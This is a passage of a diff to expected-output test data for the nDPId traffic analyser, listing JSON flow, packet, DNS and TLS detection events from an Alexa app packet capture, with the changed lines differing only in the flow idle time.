-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1490976029858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976029858,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9PhAAOcGq4c0XugArBAq2AG7gxTPTpIKFf8oBnASH\/5MlgAAAgQFtAEDAwY="} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1490976029859,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976029859,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYetAAEAG5Z2sECrYNF7oAIMUAbsV\/ygGz06SC1AQAVeXBwAA"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029756,"flow_last_seen":1490976029862,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976029862,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01030{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01361{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3563,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","server_names":"mads.amazon-adsystem.com,mads.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mads.amazon.com","fingerprint":"E0:2E:BD:D6:46:9B:05:03:93:CC:A7:28:7A:F4:57:9C:EB:40:8F:AB"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029756,"flow_last_seen":1490976029756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976029756,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1490976029756,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029756,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YepAAEAG5YqsECrYNF7oAIMUAbsV\/ygFAAAAAKAC\/\/9G\/wAAAgQFtAQCCAoA9knvAAAAAAEDAwg="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1490976029858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976029858,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9PhAAOcGq4c0XugArBAq2AG7gxTPTpIKFf8oBnASH\/5MlgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1490976029859,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976029859,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYetAAEAG5Z2sECrYNF7oAIMUAbsV\/ygGz06SC1AQAVeXBwAA"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029756,"flow_last_seen":1490976029862,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976029862,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01030{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01361{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":90,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976029756,"flow_last_seen":1490976030031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3563,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1490976030031,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mads.amazon-adsystem.com","server_names":"mads.amazon-adsystem.com,mads.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mads.amazon.com","fingerprint":"E0:2E:BD:D6:46:9B:05:03:93:CC:A7:28:7A:F4:57:9C:EB:40:8F:AB"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030681,"flow_last_seen":1490976030681,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976030681,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1490976030681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1490976030681,"pkt":"AMDKkaPvePiC0\/vCCABFAABEWlBAAEARM1+sECrYrBAqARy+ADUAMIK\/xAMBAAABAAAAAAAAC2ZpcnMtdGEtZzdnBmFtYXpvbgNjb20AAAEAAQ=="} 
00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030681,"flow_last_seen":1490976030681,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976030681,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1490976030758,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1490976030758,"pkt":"ePiC0\/vCAMDKkaPvCABFwABQalIAAEABYqGsECoBrBAq2AUBAe6sECoqRQAANMRJQAA\/Bpp3rBAq2DRV0cXXygG707KdlouELZKAEAGm9GwAAAEBCAoA9kpTbQnnbg=="} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1490976030890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1490976030890,"pkt":"ePiC0\/vCAMDKkaPvCABFAABU0XFAAEARvC2sECoBrBAq2AA1HL4AQPRGxAOBgAABAAEAAAAAC2ZpcnMtdGEtZzdnBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAABwABDbvFrk="} 
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976030890,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"firs-ta-g7g.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.22.185"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030894,"flow_last_seen":1490976030894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976030894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1490976030894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976030894,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8J69AAEAG7nysECrYNu8WudGyAbvyuG3OAAAAAKAC\/\/+kIgAAAgQFtAQCCAoA9kphAAAAAAEDAwg="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1490976031102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976031102,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwN3JAAOcGN8U27xa5rBAq2AG70bLD2Mra8rhtz3ASH\/580QAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1490976031103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976031103,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJ7BAAEAG7o+sECrYNu8WudGyAbvyuG3Pw9jK21AQAVfHQgAA"} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976030894,"flow_last_seen":1490976031106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976031106,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976030894,"flow_last_seen":1490976031185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976031185,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976030894,"flow_last_seen":1490976031186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3549,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976031186,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","server_names":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=firs-ta-g7g.amazon.com","fingerprint":"A0:32:45:00:21:A0:00:56:62:BA:FE:E7:68:81:40:5F:68:7E:A6:86"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976030894,"flow_last_seen":1490976030894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976030894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1490976030894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976030894,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8J69AAEAG7nysECrYNu8WudGyAbvyuG3OAAAAAKAC\/\/+kIgAAAgQFtAQCCAoA9kphAAAAAAEDAwg="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1490976031102,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976031102,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwN3JAAOcGN8U27xa5rBAq2AG70bLD2Mra8rhtz3ASH\/580QAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1490976031103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976031103,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJ7BAAEAG7o+sECrYNu8WudGyAbvyuG3Pw9jK21AQAVfHQgAA"} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976030894,"flow_last_seen":1490976031106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976031106,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976030894,"flow_last_seen":1490976031185,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976031185,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976030894,"flow_last_seen":1490976031186,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3549,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976031186,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"firs-ta-g7g.amazon.com","server_names":"firs-ta-g7g.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=firs-ta-g7g.amazon.com","fingerprint":"A0:32:45:00:21:A0:00:56:62:BA:FE:E7:68:81:40:5F:68:7E:A6:86"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031581,"flow_last_seen":1490976031581,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976031581,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1490976031581,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976031581,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WlFAAEARM2SsECrYrBAqAaBGADUAKk94StwBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} 
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031581,"flow_last_seen":1490976031581,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976031581,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 